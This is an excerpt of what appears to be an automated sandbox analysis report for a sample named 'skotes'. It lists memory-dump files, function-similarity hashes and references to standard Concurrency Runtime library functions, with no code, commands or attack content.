                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 512098550-0
                                                                                                                                                                                                                                                  • Opcode ID: 2cb71caab1c43d20884abd66ef226fb8451c41295cc4d48adfe0a28a426d1591
                                                                                                                                                                                                                                                  • Instruction ID: 875cc25e76d5ee6e2288a375b3e1b70dbb7c69e2cd8128a99367e0350a50f682
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb71caab1c43d20884abd66ef226fb8451c41295cc4d48adfe0a28a426d1591
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4416175A00619EFCF09DF65C454A6DBBB6FF48314F04816AE906A7391CB78AE01CF85
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0049D344
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049D367
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0049D370
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049D3A8
                                                                                                                                                                                                                                                  • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0049D3B3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4212520697-0
                                                                                                                                                                                                                                                  • Opcode ID: d94a19646f49a7e885198ce3e867d4cc47f2b8abfd3dd0308b3f54bf4c57c9e5
                                                                                                                                                                                                                                                  • Instruction ID: df0199be9de7e34c20fe84c505f72b7033c5dd627ec46a44e419143b9f1182c6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d94a19646f49a7e885198ce3e867d4cc47f2b8abfd3dd0308b3f54bf4c57c9e5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9331A375B00210DFCF15DF55C485FAEBBA5AF88304F1441AAE8069B392CB78AD41CB96
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _SpinWait.LIBCONCRT ref: 004986EE
                                                                                                                                                                                                                                                    • Part of subcall function 0048EAD0: _SpinWait.LIBCONCRT ref: 0048EAE8
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00498702
                                                                                                                                                                                                                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00498734
                                                                                                                                                                                                                                                  • List.LIBCMT ref: 004987B7
                                                                                                                                                                                                                                                  • List.LIBCMT ref: 004987C6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3281396844-0
                                                                                                                                                                                                                                                  • Opcode ID: cd07f172115fcf458688144da2965de77882c86772451437fdf24d97fb892235
                                                                                                                                                                                                                                                  • Instruction ID: 839437c0312a15950587b5f4abd6a32925ef3438273789b2e0cf48d2253ba555
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd07f172115fcf458688144da2965de77882c86772451437fdf24d97fb892235
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F3145329012559FCF14EFA9C9816EDBBB1BF06318B2400BFD80167652CB39A904CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A18A4
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004A18EB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
